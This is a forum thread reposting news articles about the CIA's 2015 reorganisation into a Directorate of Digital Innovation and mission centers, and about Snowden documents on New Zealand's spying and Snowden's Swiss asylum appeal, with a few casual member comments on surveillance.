The Pentagon, FBI and Department of Homeland Security have stepped up cybersecurity operations, and the White House last month announced a new agency to help analyze and share digital threat information between government and business.

The new CIA division will be called the Directorate of Digital Innovation. It will have the same level of authority as the four long-standing directorates responsible for clandestine operations, analysis, spy gadgetry and logistical support.

"We must place our activities and operations in the digital domain at the very center of all our mission endeavors," Brennan told the CIA workforce on Friday.

The new focus threatens to put the CIA in direct competition with the mammoth National Security Agency, which specializes in breaking codes, vacuuming up conversations and communications, and analyzing huge troves of digital transmissions. The Pentagon's Cyber Command is responsible for launching digital warfare.

U.S. intelligence is both at the forefront, and a leading target, of hack attacks. The CIA long has barred people from bringing smartphones, portable hard drives and other digital devices into its headquarters to prevent people from copying or corrupting sensitive files.
Those fears were reinforced when Edward Snowden, a former CIA employee who went to work for the NSA as a contractor, copied vast troves of highly classified files about NSA surveillance systems and gave them to journalists. Snowden now lives in exile in Russia.

Officials said the CIA would focus less on collecting so-called signals intelligence and more on how to use digital tools to help protect American operatives and persuade adversaries to spill their secrets.

"We don't want to invest a lot of time, resources and energy" recruiting sources to steal secrets that are freely available online, Brennan told reporters.

As part of the reorganization, the agency also will create 10 regional and issue-focused "mission centers" that will attempt to break down the traditional walls between the directorates, especially the operators who steal secrets and recruit agents and the analysts who pore over data and brief policymakers and the president.

"There was, I think, great esprit de corps in those directorates, but also at times those directorates were a bit siloed, and were stovepiped," not sharing critical intelligence, Brennan said. Crucial data about threats still fall into "seams" between different divisions, he added.

The CIA was pilloried after the Sept. 11, 2001, terrorist attacks for failing to share information that might have allowed U.S. authorities to stop the Al Qaeda plot. The 9/11 Commission recommended numerous reforms after that intelligence failure, partly aimed at ending the lack of communication, but Brennan's comments suggest the problem persists.

Michael Allen, a former staff member for the House Intelligence Committee, said Brennan wanted to clone the aggressive focus that the CIA's counter-terrorism center used to track and kill scores of Al Qaeda operatives and ultimately Osama bin Laden.

"Brennan is trying to integrate the CIA's dissimilar tribes to replicate the manhunting success" after 2001, Allen said.

He said the attempt to break down barriers between analysts and operators, two deeply entrenched cultures, wouldn't be easy.

"This will take years and bureaucratic blood on the floor to blend these cultures," he said.

Brennan said that when he joined the CIA in 1980, headquarters kept a separate cafeteria for undercover officers to shield their identities from rank-and-file employees. Field operatives sometimes mocked analysts for sitting at a desk, and analysts worried that knowing too much about espionage could bias their interpretation of information.

That culture has changed over the last decade, but not enough, Brennan said.

He said the head of each mission center would draw personnel from the five directorates to follow urgent threats and fill information gaps. The centers will be organized by region, such as Africa or East Asia, or by type of threat, such as terrorism or illicit weapons proliferation.

Brennan said that the CIA had been "going all out" since 2001 but that he decided to "take a step back" to look at possible improvements after President Obama appointed him to head the agency in 2013.

Last September, Brennan appointed nine senior intelligence officials to see whether CIA organizational structure and policies should change. After three months, which included a poll of the CIA workforce, the team made recommendations that formed the basis of what Brennan decided to do.


Some are largely symbolic. The National Clandestine Service will revert to the name it used for six decades until 2005, the Directorate of Operations, a moniker familiar to fans of Cold War thrillers. The directorate of intelligence post will be renamed directorate of analysis to better reflect its duties.

The agency is also revamping how it teaches spycraft. Instead of each directorate running its own schools, training programs will be brought together under a chancellor at a facility Brennan called "CIA University."

The changes will be rolled out over the next several months, Brennan said. "None of this can be done at the flip of a light switch," he said.

brian.bennett@latimes.com




Glaucon

Quote from: zorgon on January 02, 2015, 01:59:41 AM
I found a better way :P

Just invite them in... it will catch them off guard :D
Exactly

I send the FBI emails all the time. When the Civil Liberties and privacy office of the NSA disseminates something, I mark the thing up with tons of comments and email it back to them  ;D ;D
Don't forget the NSA is a foreign intelligence agency. If you're paranoid, be paranoid of the FBI.
"The beginning of wisdom comes with the definition of terms" -Socrates

"..that the people being ignorant, and always discontented, to lay the foundation of government in the unsteady opinion and uncertain humour of the people, is to expose it to certain ruin" -Locke

zorgon

#536
Just an FYI  when we were checking IP addresses for spam for new members one account was the US NAVY Cyber Spook office in Quantico

Not sure if it is still here after we deleted the zero post members because I forgot which one it was. I think I posted it in Mod chat though  :D

Google searches:

Navy cyber crime unit

Army cyber crime unit

space otter


gonna be interesting to see if anyone takes him  - in his attempt to leave russia



Snowden Documents: New Zealand Spying On Pacific Neighbors And Indonesia



Reuters 
   Posted:  03/04/2015 8:31 pm EST    Updated:  03/05/2015 1:59 pm EST

vid at link


WELLINGTON, March 5 (Reuters) - New Zealand has been spying electronically on its Pacific Island neighbors and Indonesia and sharing the intelligence with its international allies, according to documents released on Thursday.

The documents, released by former U.S. National Security Authority contractor Edward Snowden and dating back to 2009, said New Zealand's electronic spy agency had intercepted emails, mobile and fixed line phone calls, social media messages and other communications in small Pacific states including Fiji, Samoa, Solomon Islands, and French Polynesia.

The material gathered by the Government Communications Security Bureau (GCSB) was shared with the U.S. National Security Agency (NSA), which along with agencies in Australia, Britain, and Canada, make up the "Five Eyes" surveillance network.

"They've gone from some selected targeting of the South Pacific states and other targets to a new stage of where they just hoover up everything," investigative writer Nicky Hager said on Radio New Zealand.

"They take every single phone call, every single email, and they go straight off into databases, which are U.S. National Security Agency databases."

Hager, who is collaborating with the New Zealand Herald newspaper and Intercept website in revealing the documents, said there would be further disclosures.

The documents also said a New Zealand GCSB officer had worked with the Australian Signals Directorate in spying on Indonesian cellphone company Telkomsel.

Prime Minister John Key refused to comment on the disclosures, but had said on Wednesday when asked about their expected release that they were bound to be wrong. The GCSB also refused comment.

The role of the agency, which has a large eavesdropping facility at the top of the country's South Island, was an issue in last year's general election, with documents released by Snowden suggesting the GCSB was planning to conduct mass domestic surveillance.

The GCSB is banned from spying on New Zealand citizens, unless authorized to support other agencies, but has no legal restrictions on foreign activities.

The South Pacific region has seen military coups in Fiji, inter-communal armed strife in the Solomon Islands, while France maintains military bases in Tahiti and New Caledonia.

China has also been increasing its influence and development aid to small island states.

(Reporting by Gyles Beckford; Editing by Michael Perry)

http://www.huffingtonpost.com/2015/03/04/snowden-new-zealand-spying_n_6804742.html?cps=gravity_1598_-1460152385019099665

space otter



Edward Snowden Wants Switzerland To Grant Him Asylum

Reuters 
   Posted:  03/06/2015 9:56 am EST    Updated:  03/06/2015 11:59 am EST

By Stephanie Nebehay

GENEVA, March 6 (Reuters) - Edward Snowden has made a public appeal for Switzerland to grant him asylum, saying he would like to return to live in Geneva, where he once worked undercover for the Central Intelligence Agency.

The fugitive former U.S. spy agency contractor, wanted by Washington for leaking details of U.S. mass surveillance programs, spoke from Moscow by video link to a Geneva audience after a viewing of "Citizenfour," an Oscar-winning documentary about his case.

"I would love to return to Switzerland, some of my favorite memories are from Geneva. It's a wonderful place," he told the International Film Festival and Forum on Human Rights on Thursday night, where he was asked about seeking asylum.

"I do think Switzerland would be a sort of great political option because it has a history of neutrality," he said, praising its multicultural diversity and human rights record.

Snowden said he had appealed to 21 countries, "the majority in central and Western Europe," for asylum after the United States canceled his passport and he was stopped from going to Ecuador.

"Unfortunately no country said yes," he said, blaming "political interference" by the Obama administration.

Snowden was accredited to the U.S. diplomatic mission in Geneva from March 2007 to February 2009, tapping communications systems.

"Switzerland still has an active U.S. espionage presence, I think that is true of other countries as well ... espionage is illegal in Switzerland," he said.

Snowden, 31, reiterated that he would not return to the United States unless offered a "fair trial."

"I am working very hard with my lawyers to try to get reliable guarantees of a fair trial. Unfortunately the Department of Justice is unwilling to agree in that regard.

"The only thing they have said at this point is that they would not execute me, which is not the same as a fair trial."

Sherif Elsayed-Ali of Amnesty International said in a debate after the film by Laura Poitras that Snowden deserved asylum.

"Edward Snowden is without a doubt a whistleblower and someone who should be protected. He should not even be tried, because what he did was to expose government over-reach and things that should not be happening."

Under current Swiss laws, an applicant has to be on Swiss territory to lodge an asylum request.

Snowden currently has asylum in Russia.

Historian Hubertus Knabe said in the debate: "It's so tragic that he got asylum where democracy does not exist and the secret police has such an important role that the former head of it is now president." (Reporting by Stephanie Nebehay; editing by Andrew Roche)



http://www.huffingtonpost.com/2015/03/06/edward-snowden-switzerland-asylum_n_6816302.html